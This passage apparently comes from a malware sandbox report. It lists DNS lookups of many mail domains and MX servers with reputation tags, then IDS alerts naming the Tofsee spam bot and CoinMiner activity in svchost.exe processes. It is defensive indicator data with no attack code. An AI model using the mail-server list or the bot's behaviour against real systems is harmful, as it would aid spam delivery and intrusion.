| video-weaver.prg02.hls.ttvnw.net | 52.223.198.11
|
unknown |
| icav.es | No response | unknown |
| icav-es.mail.protection.outlook.com | 104.47.4.36
104.47.6.36 |
unknown |
| globesoft.net | No response | unknown |
| komistat.ru | No response | unknown |
| mx1.hostinger.ru | 145.14.159.241
|
unknown |
| recall.com | No response | unknown |
| mxb-00016e01.gslb.pphosted.com | 148.163.153.138
|
unknown |
| parket-sale.ru | No response | unknown |
| hutchtel.net | No response | unknown |
| mail4.newulmtel.net | 66.60.192.46
|
unknown |
| kruebeck.com | No response | unknown |
| integratednetworks.net | No response | unknown |
| doehler.ru | No response | unknown |
| mf1.nic.ru | 109.70.27.133
|
unknown |
| sunsrce.com | No response | unknown |
| cluster1.us.messagelabs.com | 67.219.251.58
67.219.250.192 67.219.250.202 67.219.246.96 67.219.250.96 67.219.247.58 67.219.250.106 67.219.246.192 67.219.246.202 67.219.247.48 67.219.251.48 67.219.246.106 |
unknown |
| hotmail.es | No response | unknown |
| quistbergh.se | No response | unknown |
| e-kolay.net | No response | unknown |
| hron-prostatit.ru | No response | unknown |
| yahoo.nl | No response | unknown |
| mx-eu.mail.am0.yahoodns.net | 188.125.73.87
212.82.101.46 |
unknown |
| kamenshvat.ru | No response | unknown |
| ovnt.net | No response | unknown |
| rambler.ru | No response | malicious |
| inmx.rambler.ru | 81.19.78.67
81.19.78.65 81.19.78.66 81.19.78.64 |
unknown |
| aol.com | No response | malicious |
| mx-aol.mail.gm0.yahoodns.net | 98.137.157.43
66.218.85.151 67.195.228.87 98.136.96.73 74.6.141.40 98.136.101.116 |
unknown |
| ehk.ericsson.se | No response | unknown |
| outlandtravel.com | No response | unknown |
| mx1-us1.ppe-hosted.com | 67.231.154.162
148.163.129.50 |
unknown |
| smtp.aliceposta.it | 82.57.200.133
|
unknown |
| alice.it | No response | unknown |
| yahoo.fr | No response | malicious |
| nomadturk.net | No response | unknown |
| katcom.ru | No response | unknown |
| clarkstongroup.com | No response | unknown |
| wymt-tv.com | No response | unknown |
| hotmail.cl | No response | unknown |
| nam.olc.protection.outlook.com | 104.47.41.33
104.47.40.33 |
unknown |
| ira2.iraqimuraba.net | No response | unknown |
| msx-smtp-mx1.hinet.net | 168.95.5.117
168.95.5.116 168.95.5.111 168.95.5.113 168.95.5.115 168.95.5.118 168.95.5.112 168.95.5.119 168.95.5.114 168.95.5.120 |
unknown |
| ms3.hinet.net | No response | unknown |
| advection.ru | No response | unknown |
| esm.ericsson.se | No response | unknown |
| premierconnect.co.uk | No response | unknown |
| mx2.pub.mailpod7-cph3.one.com | 185.164.14.87
|
unknown |
| ccom.net | No response | unknown |
| mx1.naver.com | 125.209.238.100
|
unknown |
| naver.com | No response | unknown |
| kaunt.ru | No response | unknown |
| market.yandex.ru | 87.250.250.22
|
whitelisted |
| yahoo.com.sg | No response | malicious |
| mx-apac.mail.gm0.yahoodns.net | 106.10.248.75
106.10.248.84 |
unknown |
| mic.ericsson.se | No response | unknown |
| premierconstructors.net | No response | unknown |
| mail0.morningstar.net | 216.228.237.47
|
unknown |
| mail.morningstar.net | No response | unknown |
| futuretoday.ru | No response | unknown |
| aristotle.algonet.se | No response | unknown |
| prudentialcres.com | No response | unknown |
| di1.ru | No response | unknown |
| rojani.com | No response | unknown |
| alt2.aspmx.l.google.com | 74.125.68.26
|
whitelisted |
| mx.dca.untd.com | 64.136.44.37
|
unknown |
| juno.com | No response | whitelisted |
| messagerie.net | No response | unknown |
| mx.imadiff.net | 194.69.195.168
|
unknown |
| relay.mvm-auto.ru | 91.198.130.237
|
unknown |
| mvm-auto.ru | No response | unknown |
| thai.com | No response | whitelisted |
| nm.ru | No response | unknown |
| mx01.inet.co.th | 61.47.47.151
|
unknown |
| gmx.ch | No response | whitelisted |
| mx01.emig.gmx.net | 212.227.17.5
|
whitelisted |
| rojascavaliere.com | No response | unknown |
| msx-smtp-mx2.hinet.net | 168.95.5.219
168.95.5.220 168.95.5.216 168.95.5.211 168.95.5.212 168.95.5.213 168.95.5.215 168.95.5.218 168.95.5.214 168.95.5.217 |
unknown |
| ms2.hinet.net | No response | unknown |
| tuktuk.ru | No response | unknown |
| mail.spreadtradesystems.com | 76.12.212.238
|
unknown |
| spreadtradesystems.com | No response | unknown |
| hotmail.ru | No response | unknown |
| mailtest1.eu | 69.172.229.252
|
unknown |
| yahoo.co.za | No response | unknown |
| altavista.se | No response | unknown |
| rojasconstruction.net | No response | unknown |
| mx05.register.com | 64.29.145.41
|
unknown |
| d55365a.ess.barracudanetworks.com | 209.222.82.132
209.222.82.156 209.222.82.147 209.222.82.129 209.222.82.162 209.222.82.138 209.222.82.165 209.222.82.126 209.222.82.150 209.222.82.153 209.222.82.135 209.222.82.159 209.222.82.141 209.222.82.144 |
unknown |
| doctors.org.uk | No response | whitelisted |
| ms28.hinet.net | No response | unknown |
| predictivesolutions.ru | No response | unknown |
| mx30.aha.ru | 62.113.100.30
|
unknown |
| msa.hinet.net | No response | unknown |
| msa-smtp-mx2.hinet.net | 168.95.6.62
168.95.6.63 168.95.6.67 168.95.6.64 168.95.6.68 168.95.6.70 168.95.6.69 168.95.6.66 168.95.6.65 168.95.6.61 |
unknown |
| ret.ru | No response | whitelisted |
| ms36.hinet.net | No response | unknown |
| soft-shop.ru | No response | unknown |
| ya.ru | No response | whitelisted |
| vision.se | No response | unknown |
| tvs.se | No response | unknown |
| mail1.vision.se | 212.214.85.72
|
unknown |
| christianyouthgroup.org | No response | unknown |
| mail1.bravehost.com | 65.39.211.20
|
unknown |
| olivoscomputadoras.net | No response | unknown |
| bodrik.ru | No response | unknown |
| yahoo.com.mx | No response | malicious |
| babytoy.ru | No response | unknown |
| mta7.am0.yahoodns.net | 66.218.85.52
67.195.228.94 74.6.137.65 98.137.159.27 98.137.159.26 98.137.159.25 98.137.159.28 74.6.137.64 |
unknown |
| nettime.se | No response | unknown |
| mail.oboj.net | 195.178.185.14
|
unknown |
| mx-1.rojasortega.com | 212.48.78.1
|
unknown |
| rojasortega.com | No response | unknown |
| solont.net | No response | unknown |
| dnaoffice.ru | No response | unknown |
| mx2srv.dnaoffice.ru | 89.17.62.6
|
unknown |
| salut-tour.ru | No response | unknown |
| mx2.centre.ru | 194.186.45.245
194.186.45.245 |
unknown |
| hotmail.it | No response | unknown |
| www.algonet.se | No response | unknown |
| pfsfa.com | No response | unknown |
| cuda.egistech.com | 13.86.35.249
|
unknown |
| thomashart.org | No response | unknown |
| fsmail.net | No response | unknown |
| smilegames.ru | No response | unknown |
| pro-smarthome.ru | No response | unknown |
| pixelpoint-artistry.com | No response | unknown |
| mail.pixelpoint-artistry.com | 192.252.156.19
|
unknown |
| questgroup.biz | No response | unknown |
| naver.net | No response | whitelisted |
| mx3.naver.com | 125.209.222.14
|
unknown |
| mx1.hosting.reg.ru | 31.31.194.100
31.31.194.101 |
unknown |
| artstoria.ru | No response | unknown |
| pro-spect.ru | No response | unknown |
| writingreliefnow.com | No response | unknown |
| salemiappliance.com | 104.47.36.33
104.47.37.33 |
unknown |
| mx1.emailsrvr.com | 184.106.54.1
|
unknown |
| peoplepc.com | No response | whitelisted |
| mx6.earthlink.net | 207.69.189.229
|
unknown |
| ksb-itur.es | No response | unknown |
| smtp.itur.com | 103.112.211.53
|
unknown |
| rkf.org.ru | No response | whitelisted |
| pro-stend.ru | No response | unknown |
| rangerdj.com | No response | unknown |
| indeedemail.com | No response | unknown |
| mxb.mailgun.org | 34.236.1.24
34.200.158.111 |
unknown |
| ms23.hinet.net | No response | unknown |
| drive13.ru | No response | unknown |
| pro-tec-russia.ru | No response | unknown |
| extragroup.de | No response | unknown |
| mxlb.ispgateway.de | 80.67.18.126
|
unknown |
| ost.ericsson.se | No response | unknown |
| srv.ced.pl | No response | unknown |
| clubmillesime.com | No response | unknown |
| technip.com | No response | whitelisted |
| mxb-00166701.gslb.pphosted.com | 67.231.156.149
|
unknown |
| ms24.hinet.net | No response | unknown |
| grw.ru | No response | unknown |
| grw-cggw-02.grw.ru | 194.87.167.23
|
unknown |
| sleepyeyetel.net | No response | unknown |
| mail3.newulmtel.net | 66.60.193.46
|
unknown |
| pro-uchet.ru | No response | unknown |
| eldia.se | No response | unknown |
| srvcfirst.com | No response | unknown |
| in.hes.trendmicro.com | 54.219.191.21
54.219.191.20 |
unknown |
| vodafone.it | No response | whitelisted |
| mx.vodafone.arubamail.it | 62.149.178.10
|
unknown |
| ms26.hinet.net | No response | unknown |
| novatika.ru | No response | unknown |
| webtv.net | No response | unknown |
| emx.mail.ru | 94.100.180.180
217.69.139.180 |
unknown |
| pro2s.ru | No response | unknown |
| buwa.nl | No response | unknown |
| smtp.routit.net | 89.146.30.19
89.146.30.25 89.146.30.9 89.146.30.18 89.146.30.1 89.146.30.20 89.146.30.17 89.146.30.26 89.146.30.10 89.146.30.2 |
unknown |
| tiscali.se | No response | unknown |
| stanfordalumni.org | No response | unknown |
| in.mx2.mailhostbox.com | 203.13.40.16
|
unknown |
| vsnl.net | No response | unknown |
| smsfortumo.ru | No response | unknown |
| pro34.ru | No response | unknown |
| ntlworld.com | No response | unknown |
| mx.mnd.ukmail.iss.as9143.net | 212.54.58.11
|
unknown |
| tiscalinet.it | No response | unknown |
| etb-1.mail.tiscali.it | 213.205.33.63
213.205.33.62 213.205.33.61 213.205.33.64 |
unknown |
| riosecon.com.br | No response | unknown |
| mail.riosecon.com.br | 23.254.202.115
|
unknown |
| yahoo.it | No response | unknown |
| ingenioer.dk | No response | unknown |
| kards.ru | No response | unknown |
| stylegirl.ru | No response | unknown |
| riosecreto.com | No response | unknown |
| cpporghalib.com | No response | unknown |
| etb-2.mail.tiscali.it | 213.205.33.63
213.205.33.61 213.205.33.64 213.205.33.62 |
unknown |
| tiscali.it | No response | whitelisted |
| mailserver.ferttec.com | 72.52.216.251
|
unknown |
| ALT2.ASPMX.L.GOOGLE.COM | 74.125.68.27
|
whitelisted |
| revealed.net | No response | unknown |
| mail.rasch-network.de | 144.76.173.228
|
unknown |
| josefstotten.de | No response | unknown |
| gbi15.ru | No response | unknown |
| stylensk.ru | No response | unknown |
| marinalodge.ne | No response | unknown |
| riosfinest.com | No response | unknown |
| mail.riosfinest.com | 109.70.1.156
|
unknown |
| oikosggmbh.de | No response | unknown |
| rupmet.ru | No response | unknown |
| mx3.snbox.ru | 104.27.158.118
104.27.159.118 |
unknown |
| tds.net | No response | whitelisted |
| mx.tds.net | 64.8.70.104
|
unknown |
| styrochem.ru | No response | unknown |
| cgp.sovintel.ru | 194.186.47.93
194.186.47.94 194.186.47.92 |
unknown |
| bono.it | No response | unknown |
| safe-mail.net | No response | whitelisted |
| dekel.safe-mail.net | 212.29.227.84
|
unknown |
| mx00.mail.com | 74.208.5.20
|
shared |
| consultant.com | No response | unknown |
| mx.xtra.co.nz | 210.55.143.33
|
unknown |
| xtra.co.nz | No response | whitelisted |
| MAIL.svg.ru | 94.137.227.51
|
unknown |
| t-online.de | No response | whitelisted |
| svg.ru | No response | unknown |
| mx01.t-online.de | 194.25.134.72
|
unknown |
| mhn.ru | No response | unknown |
| relay.mhn.ru | 80.73.164.148
|
unknown |
| wshmc.org | No response | unknown |
| qq.com | No response | unknown |
| mail.wshmc.org | 159.69.43.58
|
unknown |
| mx3.qq.com | 203.205.219.57
|
unknown |
| rvtransportservice.com | No response | unknown |
| caseybates.com.au | No response | unknown |
| severencom.ru | No response | unknown |
| 1met.ru | No response | unknown |
| nwpl.org.za | No response | unknown |
| w-shopnet.com | No response | unknown |
| mail.nwpl.org.za | 196.15.131.133
|
unknown |
| attglobal.net | No response | unknown |
| une.net.co | No response | whitelisted |
| mx1c45.carrierzone.com | 216.55.149.41
|
unknown |
| web.de | No response | shared |
| avas1.une.net.co | 200.13.249.116
|
unknown |
| mx-ha03.web.de | 212.227.15.17
|
unknown |
| abd-ent.ru | No response | unknown |
| hem.passagen.se | No response | unknown |
| biotech.com.bo | No response | unknown |
| simien.se | No response | unknown |
| mx1.pub.mailpod8-cph3.one.com | 185.164.14.102
|
unknown |
| plasmalab.ru | No response | unknown |
| kaneko.co.jp | No response | unknown |
| amxi.aics.ne.jp | 157.205.238.165
|
unknown |
| yahoo.com.ar | No response | malicious |
| mta5.am0.yahoodns.net | 98.137.159.27
98.137.159.24 98.137.159.26 67.195.228.110 74.6.137.63 74.6.137.65 74.6.137.64 67.195.228.94 |
unknown |
| cabus.de | No response | unknown |
| tampofer.com.br | No response | unknown |
| 400v.ru | No response | unknown |
| letsplayagametv.de | No response | unknown |
| gacrux.uberspace.de | 185.26.156.53
|
unknown |
| biad.ca | No response | unknown |
| tannenhof-schinken.de | No response | unknown |
| mx19c.antispameurope.com | 94.100.132.100
|
unknown |
| tampograficas.com | No response | suspicious |
| qsl.net | No response | whitelisted |
| inbox.ru | No response | unknown |
| mx.spamexperts.com | 31.204.155.105
69.64.57.52 149.13.73.56 149.13.73.47 149.5.95.71 154.61.81.53 31.204.154.86 5.79.86.41 149.13.73.55 162.210.198.115 154.61.81.54 31.204.155.116 149.13.73.45 38.89.254.80 149.13.73.46 31.204.154.236 149.5.95.73 149.13.73.58 38.89.254.82 212.32.233.198 38.89.254.79 212.32.243.83 149.13.73.57 149.13.73.48 154.61.81.57 |
unknown |
| warwick.net | No response | unknown |
| mail.warwick.net | 216.6.136.131
216.6.136.132 216.6.136.133 |
unknown |
| mobile.ao.pr.it | 195.62.185.201
|
unknown |
| ao.pr.it | No response | unknown |
| scheu-wirth.de | No response | unknown |
| tampopo.com.br | No response | unknown |
| sbcglobal.net | No response | unknown |
| mx.b.locaweb.com.br | 177.153.23.242
|
unknown |
| ff-ip4-mx-vip1.prodigy.net | 144.160.159.21
|
unknown |
| plus.ru | No response | unknown |
| mx4.hanmail.net | 211.231.108.176
|
unknown |
| daum.net | No response | whitelisted |
| confartigianato.an.it | No response | unknown |
| staticdatahosting.com | No response | unknown |
| mail.confartigianato.an.it | 89.97.204.43
|
unknown |
| mail.staticdatahosting.com | 104.219.251.107
|
suspicious |
| siac2.barth-co.com | 134.247.141.91
|
unknown |
| alphatrans.de | No response | unknown |
| vip-us-br-mx.terra.com | 208.84.244.133
|
unknown |
| terra.com.br | No response | whitelisted |
| rogers.com | No response | whitelisted |
| mx-rogers.mail.am0.yahoodns.net | 74.6.137.45
67.195.230.37 |
unknown |
| dostavka-pizza.ru | No response | unknown |
| iol.it | No response | malicious |
| smtp-in.iol.it | 213.209.1.129
|
unknown |
| ms54.hinet.net | No response | unknown |
| staticera.com | No response | unknown |
| uni-mainz.de | No response | whitelisted |
| spamblk.de | No response | unknown |
| ironport-2.ZDV.Net | 134.93.178.242
|
unknown |
| et-ru.mail.protection.outlook.com | 104.47.14.36
104.47.12.36 |
unknown |
| et.ru | No response | unknown |
| ms18.hinet.net | No response | unknown |
| smtp-in.libero.it | 213.209.1.129
|
unknown |
| libero.it | No response | whitelisted |
| staticfarm.com | No response | unknown |
| rbgcon05.fnb.co.za | 196.11.134.205
|
unknown |
| fnb.co.za | No response | whitelisted |
| everest-travel.de | No response | unknown |
| sion.com.ar | No response | unknown |
| relay.sion.com | 200.81.186.15
|
unknown |
Threats
| PID | Process | Class | Message |
|---|---|---|---|
| 2580 | svchost.exe | A Network Trojan was detected | MALWARE [PTsecurity] Tofsee.bot |
| 2580 | svchost.exe | A Network Trojan was detected | MALWARE [PTsecurity] Tofsee.bot |
| 2528 | svchost.exe | Potential Corporate Privacy Violation | ET POLICY Cryptocurrency Miner Checkin |
| 2528 | svchost.exe | Misc activity | MINER [PTsecurity] Riskware/CoinMiner JSON_RPC Response |
| 2528 | svchost.exe | Misc activity | MINER [PTsecurity] Risktool.W32.coinminer!c |
| 2528 | svchost.exe | Misc activity | MINER [PTsecurity] CoinMiner CryptoNight algo JSON_RPC server Response |
| 2528 | svchost.exe | Misc activity | MINER [PTsecurity] Riskware/CoinMiner JSON_RPC Response |
| 2528 | svchost.exe | Misc activity | MINER [PTsecurity] Risktool.W32.coinminer!c |
| 2528 | svchost.exe | Misc activity | MINER [PTsecurity] CoinMiner CryptoNight algo JSON_RPC server Response |
Debug output strings
No debug info.